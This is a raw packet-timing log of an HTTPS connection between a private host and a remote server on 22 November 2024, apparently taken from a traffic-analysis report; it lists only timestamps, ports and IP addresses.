                                                                Nov 22, 2024 17:12:06.673782110 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.673799992 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.673827887 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.673847914 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.679826021 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.679847002 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.679919004 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.679935932 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.680012941 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.686099052 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.686125040 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.686187983 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.686206102 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.686225891 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.686249971 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.691699982 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.691720963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.691781044 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.691795111 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.691823959 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.691843033 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.697730064 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.697751045 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.697829962 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.697844028 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.697889090 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.703557968 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.703581095 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.703665972 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.703680038 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.703735113 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.747699022 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.747729063 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.747817039 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.747834921 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.747874975 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.753273010 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.753295898 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.753355980 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.753374100 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.753401041 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.753418922 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.875473022 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.875514030 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.875581026 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.875607014 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.875641108 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.875660896 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.880927086 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.880950928 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.881011963 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.881030083 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.881062031 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.881078959 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.887080908 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.887103081 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.887182951 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.887203932 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.887240887 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.887257099 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.893312931 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.893336058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.893394947 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.893409014 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.893449068 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.893472910 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.898730040 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.898752928 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.898847103 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.898859024 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.898905039 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.905450106 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.905488968 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.905544996 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.905558109 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.905586004 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.905610085 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.949079990 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.949110031 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.949165106 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.949182987 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.949218988 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.949244976 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.954685926 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.954713106 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.954782963 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.954799891 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.954854012 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.078452110 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.078481913 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.078531027 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.078551054 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.078573942 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.078594923 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.082849979 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.082870960 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.082946062 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.082950115 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.082990885 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.089046955 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.089066982 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.089108944 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.089112997 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.089164019 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.094400883 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.094427109 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.094482899 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.094487906 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.094553947 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.100543022 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.100564003 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.100600958 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.100605965 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.100632906 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.100652933 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.106667995 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.106688023 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.106764078 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.106769085 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.106800079 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.150340080 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.150372028 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.150449991 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.150459051 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.150471926 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.150928974 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.156356096 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.156378984 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.156445026 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.156450033 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.156481981 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.156492949 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.278666973 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.278733015 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.278774023 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.278841972 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.278877020 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.278915882 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.284499884 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.284548998 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.284591913 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.284605980 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.284637928 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.284677029 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.290566921 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.290621996 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.290657997 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.290671110 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.290702105 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.290724993 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.296614885 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.296658993 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.296703100 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.296715021 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.296742916 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.296767950 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.302155972 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.302205086 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.302243948 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.302257061 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.302303076 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.302323103 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.308037996 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.308084965 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.308115005 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.308128119 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.308159113 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.308177948 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.352134943 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.352200031 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.352250099 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.352324009 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.352359056 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.352385044 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.357631922 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.357678890 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.357727051 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.357741117 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.357774973 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.357795000 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.479157925 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.479187965 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.479301929 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.479336023 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.479381084 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.485579967 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.485605001 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.485658884 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.485675097 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.485713005 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.485733986 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.491512060 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.491537094 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.491633892 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.491645098 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.491682053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.497761011 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.497786999 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.497840881 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.497852087 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.497901917 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.503223896 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.503247976 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.503323078 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.503334045 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.503380060 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.509021044 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.509046078 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.509103060 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.509114027 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.509144068 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.509166002 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.553204060 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.553246021 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.553312063 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.553330898 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.553368092 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.553389072 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.558965921 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.559000015 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.559041977 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.559050083 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.559094906 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.681261063 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.681335926 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.681384087 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.681468010 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.681505919 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.681530952 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.686695099 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.686750889 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.686791897 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.686821938 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.686853886 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.687293053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.692874908 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.692923069 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.692984104 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.692997932 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.693017960 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.693038940 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.699049950 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.699095964 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.699153900 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.699167013 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.699212074 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.704674959 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.704725027 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.704802036 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.704819918 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.704863071 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.711081982 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.711132050 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.711191893 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.711203098 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.711240053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.754447937 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.754483938 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.754581928 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.754609108 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.754647970 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.759876013 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.759903908 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.759948015 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.759958029 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.760003090 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.882391930 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.882420063 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.882502079 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.882523060 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.882574081 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.888686895 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.888709068 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.888802052 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.888813019 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.888860941 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.894157887 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.894175053 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.894263983 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.894274950 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.894314051 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.900298119 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.900316000 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.900387049 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.900397062 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.900445938 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.906590939 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.906610012 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.906732082 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.906743050 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.906790972 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.912302017 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.912317991 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.912374020 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.912389994 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.912422895 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.912436008 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.955661058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.955686092 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.955756903 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.955774069 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.955811024 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.961911917 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.961939096 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.961987972 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:07.961992979 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:07.962299109 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.083991051 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.084017038 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.084115982 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.084145069 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.084187031 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.090245008 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.090265989 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.090361118 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.090394020 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.090437889 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.095813990 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.095841885 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.095923901 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.095944881 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.096151114 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.101857901 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.101881981 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.101953983 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.101984978 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.102056980 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.108058929 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.108082056 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.108141899 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.108159065 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.108182907 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.108203888 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.113915920 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.113943100 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.114018917 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.114032030 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.114070892 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.157419920 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.157445908 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.157496929 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.157529116 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:08.157543898 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:08.157721043 CET49744443192.168.2.577.91.73.101
